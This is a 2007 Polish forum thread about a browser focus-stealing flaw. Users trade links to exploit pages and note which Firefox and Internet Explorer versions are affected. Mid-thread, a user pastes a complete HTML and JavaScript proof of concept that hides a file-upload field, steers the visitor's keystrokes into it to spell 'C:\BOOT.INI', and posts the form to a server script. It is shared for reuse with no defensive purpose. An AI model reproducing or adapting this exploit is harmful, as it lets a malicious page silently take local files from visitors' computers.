raz kolejny problem z gg

**p_e_t_e_r** · 03-27-2007

Napisał markossx

szkoda bo nie zdążyłem się z nimi zapoznać, może jeszcze je gdzieś udostepnić na troche

Poszukaj na google tematu focus stealing vulnarability. Na pewno znajdziesz podobne skrypty.
Pliki juz nie powroca na serwer, za duzo ludzi na to wchodzilo.

**markossx** · 03-27-2007

jasne, dzięki

**carbon** · 03-27-2007

to nie jest dziura w IE. Ciekawe czy można obejść focusa. Nie da rady tego zrobić we flashu.

**phaxe** · 03-27-2007

Napisał markossx

szkoda bo nie zdążyłem się z nimi zapoznać, może jeszcze je gdzieś udostepnić na troche

Tutaj masz inne przykłady dla IE i Firefox-a:
http://lcamtuf.coredump.cx/focusbug

pozdrawiam
phaxe

**skrzynior** · 10-28-2007

błagam o udostępnienie gdzieś tego skryptu

**gogulas** · 10-28-2007

dwie minuty na googlach...

fixed in mozilla 2.0.0.4

**eMCe** · 10-29-2007

ty sorry ale masz go "udostępnionego" jeden post wyżej od twojego!!

**skrzynior** · 10-29-2007

Napisał eMCe

ty sorry ale masz go "udostępnionego" jeden post wyżej od twojego!!

nie kminię tego zupełnie

może ktoś mi dać link do skryptu w czystej postaci albo napiszć go tutaj ewentualnie na gg 210302

<HTML>
<HEAD>
<style type="text/css">
.first {
}
.second {
color: white;
background-color: white;
opacity: 0;
}
</style>
<SCRIPT>
//document.onKeyDown = doKeyPress;

//document.onKeyUp = doKeyUp;
var saved;
var e ;
var mystring = "C:\\BOOT.INI";
//var i=mystring.length-1;
var i=0;
function doKeyPress(chucky)
{
saved = chucky.which;
//alert('pressed ' + String.fromCharCode(saved) + '(' + saved + ')');
if (mystring[i] != String.fromCharCode(saved).toUpperCase() ||
i > mystring.length-1) {
return false;
}
i++;
return true;
};
function doKeyUp () {

document.forms[0].txt.value += String.fromCharCode(saved);
document.forms[0].txt.focus();

}

</SCRIPT>
</HEAD>
<BODY >
<FORM METHOD=POST action=file.php>
<INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
OnKeyUp="doKeyUp();"
OnKeyPress="return doKeyPress(event);">
<input name=txt id='txt' type=text value=''
OnKeyDown="document.forms[0].fileupload.focus();"
onClick="">
<input type=button value="invisible"
onclick="document.forms[0].fileupload.className='second';">
<input type=button value="visible"
onclick="document.forms[0].fileupload.className='first';">

</FORM>
</BODY>
</HTML>

chyba chodzi o to. jak nie to proszę poprawcie mnie. Dziękuję za dobre chęci i udzieloną mi pomoc oraz przepraszam za swoją niekompetencję

**gogulas** · 10-29-2007

Nie chodzi o niekompetencje, ale o lenistwo.
Dwie minuty na googlach:
http://www.securityfocus.com/bid/18308/exploit

A jak wyglada plik file.php, tego nawet najstarsi gorale nie wiedza.... trzeba bedzie ruszyc lepetyna i znowu google pomeliorowac...

Ale po co to komu, skoro firefox 2.0.0.4 juz sie na to nie nabiera, nie wiem jak jest z IE

**eMCe** · 10-29-2007

IE - wersja 6.0.2900.2180_xpsp_sp2_rtm.040803-2158 (domyślnie serwowana wersja z sp2) jest podatna...

Temat: raz kolejny problem z gg

Narzędzia wątku

Display

Podobne wątki

Kolejny zielony

Zasady Postowania

Subskrybuj